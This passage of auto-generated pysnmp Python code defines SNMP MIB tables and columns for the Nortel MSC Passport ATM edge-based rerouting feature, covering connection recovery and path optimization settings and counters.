mscAtmIfVpcEbrInfoTotalConnectionRecoveries.setStatus('mandatory')\nmscAtmIfVpcEbrInfoTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1,\n 562, 36, 2, 1, 114, 4, 11, 40, 1, 2), Counter32()).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVpcEbrInfoTotalPathOptimizations.setStatus('mandatory')\nmscAtmIfVccSrcEbrOv = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, \n 5, 8, 2))\nmscAtmIfVccSrcEbrOvRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2,\n 1, 114, 5, 8, 2, 1))\nif mibBuilder.loadTexts:\n mscAtmIfVccSrcEbrOvRowStatusTable.setStatus('mandatory')\nmscAtmIfVccSrcEbrOvRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36,\n 2, 1, 114, 5, 8, 2, 1, 1)).setIndexNames((0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVccIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmNetworkingMIB', 'mscAtmIfVccSrcIndex'),\n (0, 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVccSrcEbrOvIndex'))\nif mibBuilder.loadTexts:\n mscAtmIfVccSrcEbrOvRowStatusEntry.setStatus('mandatory')\nmscAtmIfVccSrcEbrOvRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2,\n 1, 114, 5, 8, 2, 1, 1, 1), RowStatus()).setMaxAccess('readwrite')\nif mibBuilder.loadTexts:\n mscAtmIfVccSrcEbrOvRowStatus.setStatus('mandatory')\nmscAtmIfVccSrcEbrOvComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, \n 36, 2, 1, 114, 5, 8, 2, 1, 1, 2), DisplayString()).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVccSrcEbrOvComponentName.setStatus('mandatory')\nmscAtmIfVccSrcEbrOvStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36,\n 2, 1, 114, 5, 8, 2, 1, 1, 4), StorageType()).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVccSrcEbrOvStorageType.setStatus('mandatory')\nmscAtmIfVccSrcEbrOvIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,\n 114, 5, 8, 2, 1, 1, 10), NonReplicated())\nif mibBuilder.loadTexts:\n mscAtmIfVccSrcEbrOvIndex.setStatus('mandatory')\nmscAtmIfVccSrcEbrOvProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, \n 114, 5, 8, 2, 20))\nif mibBuilder.loadTexts:\n mscAtmIfVccSrcEbrOvProvTable.setStatus('mandatory')\nmscAtmIfVccSrcEbrOvProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,\n 114, 5, 8, 2, 20, 1)).setIndexNames((0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVccIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmNetworkingMIB', 'mscAtmIfVccSrcIndex'),\n (0, 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVccSrcEbrOvIndex'))\nif mibBuilder.loadTexts:\n mscAtmIfVccSrcEbrOvProvEntry.setStatus('mandatory')\nmscAtmIfVccSrcEbrOvRecoverySubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, \n 562, 36, 2, 1, 114, 5, 8, 2, 20, 1, 1), Integer32().subtype(subtypeSpec\n =ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=\n NamedValues(('no', 0), ('yes', 1))).clone('yes')).setMaxAccess('readwrite')\nif mibBuilder.loadTexts:\n mscAtmIfVccSrcEbrOvRecoverySubscribed.setStatus('mandatory')\nmscAtmIfVccSrcEbrOvOptimizationSubscribed = MibTableColumn((1, 3, 6, 1, 4, \n 1, 562, 36, 2, 1, 114, 5, 8, 2, 20, 1, 2), Integer32().subtype(\n subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(\n namedValues=NamedValues(('no', 0), ('yes', 1))).clone('yes')).setMaxAccess(\n 'readwrite')\nif mibBuilder.loadTexts:\n mscAtmIfVccSrcEbrOvOptimizationSubscribed.setStatus('mandatory')\nmscAtmIfVccEbrInfo = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5,\n 12))\nmscAtmIfVccEbrInfoRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, \n 1, 114, 5, 12, 1))\nif mibBuilder.loadTexts:\n mscAtmIfVccEbrInfoRowStatusTable.setStatus('mandatory')\nmscAtmIfVccEbrInfoRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, \n 2, 1, 114, 5, 12, 1, 1)).setIndexNames((0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVccIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVccEbrInfoIndex'))\nif mibBuilder.loadTexts:\n mscAtmIfVccEbrInfoRowStatusEntry.setStatus('mandatory')\nmscAtmIfVccEbrInfoRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2,\n 1, 114, 5, 12, 1, 1, 1), RowStatus()).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVccEbrInfoRowStatus.setStatus('mandatory')\nmscAtmIfVccEbrInfoComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36,\n 2, 1, 114, 5, 12, 1, 1, 2), DisplayString()).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVccEbrInfoComponentName.setStatus('mandatory')\nmscAtmIfVccEbrInfoStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, \n 2, 1, 114, 5, 12, 1, 1, 4), StorageType()).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVccEbrInfoStorageType.setStatus('mandatory')\nmscAtmIfVccEbrInfoIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, \n 114, 5, 12, 1, 1, 10), NonReplicated())\nif mibBuilder.loadTexts:\n mscAtmIfVccEbrInfoIndex.setStatus('mandatory')\nmscAtmIfVccEbrInfoOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, \n 114, 5, 12, 30))\nif mibBuilder.loadTexts:\n mscAtmIfVccEbrInfoOperTable.setStatus('mandatory')\nmscAtmIfVccEbrInfoOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,\n 114, 5, 12, 30, 1)).setIndexNames((0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVccIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVccEbrInfoIndex'))\nif mibBuilder.loadTexts:\n mscAtmIfVccEbrInfoOperEntry.setStatus('mandatory')\nmscAtmIfVccEbrInfoRecoverySubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, \n 562, 36, 2, 1, 114, 5, 12, 30, 1, 1), Integer32().subtype(subtypeSpec=\n ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=\n NamedValues(('no', 0), ('yes', 1)))).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVccEbrInfoRecoverySubscribed.setStatus('mandatory')\nmscAtmIfVccEbrInfoOptimizationSubscribed = MibTableColumn((1, 3, 6, 1, 4, 1,\n 562, 36, 2, 1, 114, 5, 12, 30, 1, 2), Integer32().subtype(subtypeSpec=\n ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=\n NamedValues(('no', 0), ('yes', 1)))).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVccEbrInfoOptimizationSubscribed.setStatus('mandatory')\nmscAtmIfVccEbrInfoConnectionRecovered = MibTableColumn((1, 3, 6, 1, 4, 1, \n 562, 36, 2, 1, 114, 5, 12, 30, 1, 3), Integer32().subtype(subtypeSpec=\n ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=\n NamedValues(('no', 0), ('yes', 1)))).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVccEbrInfoConnectionRecovered.setStatus('mandatory')\nmscAtmIfVccEbrInfoStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, \n 114, 5, 12, 40))\nif mibBuilder.loadTexts:\n mscAtmIfVccEbrInfoStatsTable.setStatus('mandatory')\nmscAtmIfVccEbrInfoStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,\n 114, 5, 12, 40, 1)).setIndexNames((0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVccIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVccEbrInfoIndex'))\nif mibBuilder.loadTexts:\n mscAtmIfVccEbrInfoStatsEntry.setStatus('mandatory')\nmscAtmIfVccEbrInfoTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4,\n 1, 562, 36, 2, 1, 114, 5, 12, 40, 1, 1), Counter32()).setMaxAccess(\n 'readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVccEbrInfoTotalConnectionRecoveries.setStatus('mandatory')\nmscAtmIfVccEbrInfoTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1,\n 562, 36, 2, 1, 114, 5, 12, 40, 1, 2), Counter32()).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVccEbrInfoTotalPathOptimizations.setStatus('mandatory')\nmscAtmIfUniEbr = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7))\nmscAtmIfUniEbrRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, \n 114, 6, 7, 1))\nif mibBuilder.loadTexts:\n mscAtmIfUniEbrRowStatusTable.setStatus('mandatory')\nmscAtmIfUniEbrRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,\n 114, 6, 7, 1, 1)).setIndexNames((0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmUniMIB', 'mscAtmIfUniIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfUniEbrIndex'))\nif mibBuilder.loadTexts:\n mscAtmIfUniEbrRowStatusEntry.setStatus('mandatory')\nmscAtmIfUniEbrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, \n 114, 6, 7, 1, 1, 1), RowStatus()).setMaxAccess('readwrite')\nif mibBuilder.loadTexts:\n mscAtmIfUniEbrRowStatus.setStatus('mandatory')\nmscAtmIfUniEbrComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2,\n 1, 114, 6, 7, 1, 1, 2), DisplayString()).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfUniEbrComponentName.setStatus('mandatory')\nmscAtmIfUniEbrStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,\n 114, 6, 7, 1, 1, 4), StorageType()).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfUniEbrStorageType.setStatus('mandatory')\nmscAtmIfUniEbrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114,\n 6, 7, 1, 1, 10), NonReplicated())\nif mibBuilder.loadTexts:\n mscAtmIfUniEbrIndex.setStatus('mandatory')\nmscAtmIfUniEbrProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6,\n 7, 20))\nif mibBuilder.loadTexts:\n mscAtmIfUniEbrProvTable.setStatus('mandatory')\nmscAtmIfUniEbrProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114,\n 6, 7, 20, 1)).setIndexNames((0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmUniMIB', 'mscAtmIfUniIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfUniEbrIndex'))\nif mibBuilder.loadTexts:\n mscAtmIfUniEbrProvEntry.setStatus('mandatory')\nmscAtmIfUniEbrConnectionRecovery = MibTableColumn((1, 3, 6, 1, 4, 1, 562, \n 36, 2, 1, 114, 6, 7, 20, 1, 1), OctetString().subtype(subtypeSpec=\n ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue='c0')\n ).setMaxAccess('readwrite')\nif mibBuilder.loadTexts:\n mscAtmIfUniEbrConnectionRecovery.setStatus('mandatory')\nmscAtmIfUniEbrPathOptimization = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36,\n 2, 1, 114, 6, 7, 20, 1, 2), OctetString().subtype(subtypeSpec=\n ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue='c0')\n ).setMaxAccess('readwrite')\nif mibBuilder.loadTexts:\n mscAtmIfUniEbrPathOptimization.setStatus('mandatory')\nmscAtmIfUniEbrOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6,\n 7, 30))\nif mibBuilder.loadTexts:\n mscAtmIfUniEbrOperTable.setStatus('mandatory')\nmscAtmIfUniEbrOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114,\n 6, 7, 30, 1)).setIndexNames((0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmUniMIB', 'mscAtmIfUniIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfUniEbrIndex'))\nif mibBuilder.loadTexts:\n mscAtmIfUniEbrOperEntry.setStatus('mandatory')\nmscAtmIfUniEbrSubscribedConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562,\n 36, 2, 1, 114, 6, 7, 30, 1, 1), Gauge32().subtype(subtypeSpec=\n ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfUniEbrSubscribedConnections.setStatus('mandatory')\nmscAtmIfUniEbrEligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4,\n 1, 562, 36, 2, 1, 114, 6, 7, 30, 1, 2), Gauge32().subtype(subtypeSpec=\n ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfUniEbrEligibleRecoveredConnections.setStatus('mandatory')\nmscAtmIfUniEbrIneligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, \n 4, 1, 562, 36, 2, 1, 114, 6, 7, 30, 1, 3), Gauge32().subtype(\n subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfUniEbrIneligibleRecoveredConnections.setStatus('mandatory')\nmscAtmIfUniEbrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, \n 6, 7, 40))\nif mibBuilder.loadTexts:\n mscAtmIfUniEbrStatsTable.setStatus('mandatory')\nmscAtmIfUniEbrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, \n 114, 6, 7, 40, 1)).setIndexNames((0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmUniMIB', 'mscAtmIfUniIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfUniEbrIndex'))\nif mibBuilder.loadTexts:\n mscAtmIfUniEbrStatsEntry.setStatus('mandatory')\nmscAtmIfUniEbrTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1,\n 562, 36, 2, 1, 114, 6, 7, 40, 1, 1), Counter32()).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfUniEbrTotalConnectionRecoveries.setStatus('mandatory')\nmscAtmIfUniEbrTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, \n 562, 36, 2, 1, 114, 6, 7, 40, 1, 2), Counter32()).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfUniEbrTotalPathOptimizations.setStatus('mandatory')\nmscAtmIfIispEbr = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7))\nmscAtmIfIispEbrRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, \n 114, 7, 7, 1))\nif mibBuilder.loadTexts:\n mscAtmIfIispEbrRowStatusTable.setStatus('mandatory')\nmscAtmIfIispEbrRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, \n 1, 114, 7, 7, 1, 1)).setIndexNames((0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmIispMIB', 'mscAtmIfIispIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfIispEbrIndex'))\nif mibBuilder.loadTexts:\n mscAtmIfIispEbrRowStatusEntry.setStatus('mandatory')\nmscAtmIfIispEbrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,\n 114, 7, 7, 1, 1, 1), RowStatus()).setMaxAccess('readwrite')\nif mibBuilder.loadTexts:\n mscAtmIfIispEbrRowStatus.setStatus('mandatory')\nmscAtmIfIispEbrComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2,\n 1, 114, 7, 7, 1, 1, 2), DisplayString()).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfIispEbrComponentName.setStatus('mandatory')\nmscAtmIfIispEbrStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, \n 1, 114, 7, 7, 1, 1, 4), StorageType()).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfIispEbrStorageType.setStatus('mandatory')\nmscAtmIfIispEbrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114,\n 7, 7, 1, 1, 10), NonReplicated())\nif mibBuilder.loadTexts:\n mscAtmIfIispEbrIndex.setStatus('mandatory')\nmscAtmIfIispEbrProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, \n 7, 7, 20))\nif mibBuilder.loadTexts:\n mscAtmIfIispEbrProvTable.setStatus('mandatory')\nmscAtmIfIispEbrProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, \n 114, 7, 7, 20, 1)).setIndexNames((0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmIispMIB', 'mscAtmIfIispIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfIispEbrIndex'))\nif mibBuilder.loadTexts:\n mscAtmIfIispEbrProvEntry.setStatus('mandatory')\nmscAtmIfIispEbrConnectionRecovery = MibTableColumn((1, 3, 6, 1, 4, 1, 562, \n 36, 2, 1, 114, 7, 7, 20, 1, 1), OctetString().subtype(subtypeSpec=\n ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue='c0')\n ).setMaxAccess('readwrite')\nif mibBuilder.loadTexts:\n mscAtmIfIispEbrConnectionRecovery.setStatus('mandatory')\nmscAtmIfIispEbrPathOptimization = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36,\n 2, 1, 114, 7, 7, 20, 1, 2), OctetString().subtype(subtypeSpec=\n ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue='c0')\n ).setMaxAccess('readwrite')\nif mibBuilder.loadTexts:\n mscAtmIfIispEbrPathOptimization.setStatus('mandatory')\nmscAtmIfIispEbrOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, \n 7, 7, 30))\nif mibBuilder.loadTexts:\n mscAtmIfIispEbrOperTable.setStatus('mandatory')\nmscAtmIfIispEbrOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, \n 114, 7, 7, 30, 1)).setIndexNames((0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmIispMIB', 'mscAtmIfIispIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfIispEbrIndex'))\nif mibBuilder.loadTexts:\n mscAtmIfIispEbrOperEntry.setStatus('mandatory')\nmscAtmIfIispEbrSubscribedConnections = MibTableColumn((1, 3, 6, 1, 4, 1, \n 562, 36, 2, 1, 114, 7, 7, 30, 1, 1), Gauge32().subtype(subtypeSpec=\n ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfIispEbrSubscribedConnections.setStatus('mandatory')\nmscAtmIfIispEbrEligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4,\n 1, 562, 36, 2, 1, 114, 7, 7, 30, 1, 2), Gauge32().subtype(subtypeSpec=\n ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfIispEbrEligibleRecoveredConnections.setStatus('mandatory')\nmscAtmIfIispEbrIneligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1,\n 4, 1, 562, 36, 2, 1, 114, 7, 7, 30, 1, 3), Gauge32().subtype(\n subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfIispEbrIneligibleRecoveredConnections.setStatus('mandatory')\nmscAtmIfIispEbrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114,\n 7, 7, 40))\nif mibBuilder.loadTexts:\n mscAtmIfIispEbrStatsTable.setStatus('mandatory')\nmscAtmIfIispEbrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, \n 114, 7, 7, 40, 1)).setIndexNames((0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmIispMIB', 'mscAtmIfIispIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfIispEbrIndex'))\nif mibBuilder.loadTexts:\n mscAtmIfIispEbrStatsEntry.setStatus('mandatory')\nmscAtmIfIispEbrTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1,\n 562, 36, 2, 1, 114, 7, 7, 40, 1, 1), Counter32()).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfIispEbrTotalConnectionRecoveries.setStatus('mandatory')\nmscAtmIfIispEbrTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, \n 562, 36, 2, 1, 114, 7, 7, 40, 1, 2), Counter32()).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfIispEbrTotalPathOptimizations.setStatus('mandatory')\nmscAtmIfVptIispEbr = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9,\n 6, 7))\nmscAtmIfVptIispEbrRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, \n 1, 114, 9, 6, 7, 1))\nif mibBuilder.loadTexts:\n mscAtmIfVptIispEbrRowStatusTable.setStatus('mandatory')\nmscAtmIfVptIispEbrRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, \n 2, 1, 114, 9, 6, 7, 1, 1)).setIndexNames((0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmIispMIB', 'mscAtmIfVptIispIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptIispEbrIndex'))\nif mibBuilder.loadTexts:\n mscAtmIfVptIispEbrRowStatusEntry.setStatus('mandatory')\nmscAtmIfVptIispEbrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2,\n 1, 114, 9, 6, 7, 1, 1, 1), RowStatus()).setMaxAccess('readwrite')\nif mibBuilder.loadTexts:\n mscAtmIfVptIispEbrRowStatus.setStatus('mandatory')\nmscAtmIfVptIispEbrComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36,\n 2, 1, 114, 9, 6, 7, 1, 1, 2), DisplayString()).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVptIispEbrComponentName.setStatus('mandatory')\nmscAtmIfVptIispEbrStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, \n 2, 1, 114, 9, 6, 7, 1, 1, 4), StorageType()).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVptIispEbrStorageType.setStatus('mandatory')\nmscAtmIfVptIispEbrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, \n 114, 9, 6, 7, 1, 1, 10), NonReplicated())\nif mibBuilder.loadTexts:\n mscAtmIfVptIispEbrIndex.setStatus('mandatory')\nmscAtmIfVptIispEbrProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, \n 114, 9, 6, 7, 20))\nif mibBuilder.loadTexts:\n mscAtmIfVptIispEbrProvTable.setStatus('mandatory')\nmscAtmIfVptIispEbrProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,\n 114, 9, 6, 7, 20, 1)).setIndexNames((0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmIispMIB', 'mscAtmIfVptIispIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptIispEbrIndex'))\nif mibBuilder.loadTexts:\n mscAtmIfVptIispEbrProvEntry.setStatus('mandatory')\nmscAtmIfVptIispEbrConnectionRecovery = MibTableColumn((1, 3, 6, 1, 4, 1, \n 562, 36, 2, 1, 114, 9, 6, 7, 20, 1, 1), OctetString().subtype(\n subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue\n ='c0')).setMaxAccess('readwrite')\nif mibBuilder.loadTexts:\n mscAtmIfVptIispEbrConnectionRecovery.setStatus('mandatory')\nmscAtmIfVptIispEbrPathOptimization = MibTableColumn((1, 3, 6, 1, 4, 1, 562,\n 36, 2, 1, 114, 9, 6, 7, 20, 1, 2), OctetString().subtype(subtypeSpec=\n ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue='c0')\n ).setMaxAccess('readwrite')\nif mibBuilder.loadTexts:\n mscAtmIfVptIispEbrPathOptimization.setStatus('mandatory')\nmscAtmIfVptIispEbrOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, \n 114, 9, 6, 7, 30))\nif mibBuilder.loadTexts:\n mscAtmIfVptIispEbrOperTable.setStatus('mandatory')\nmscAtmIfVptIispEbrOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,\n 114, 9, 6, 7, 30, 1)).setIndexNames((0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmIispMIB', 'mscAtmIfVptIispIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptIispEbrIndex'))\nif mibBuilder.loadTexts:\n mscAtmIfVptIispEbrOperEntry.setStatus('mandatory')\nmscAtmIfVptIispEbrSubscribedConnections = MibTableColumn((1, 3, 6, 1, 4, 1,\n 562, 36, 2, 1, 114, 9, 6, 7, 30, 1, 1), Gauge32().subtype(subtypeSpec=\n ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVptIispEbrSubscribedConnections.setStatus('mandatory')\nmscAtmIfVptIispEbrEligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1,\n 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 30, 1, 2), Gauge32().subtype(\n subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVptIispEbrEligibleRecoveredConnections.setStatus('mandatory')\nmscAtmIfVptIispEbrIneligibleRecoveredConnections = MibTableColumn((1, 3, 6,\n 1, 4, 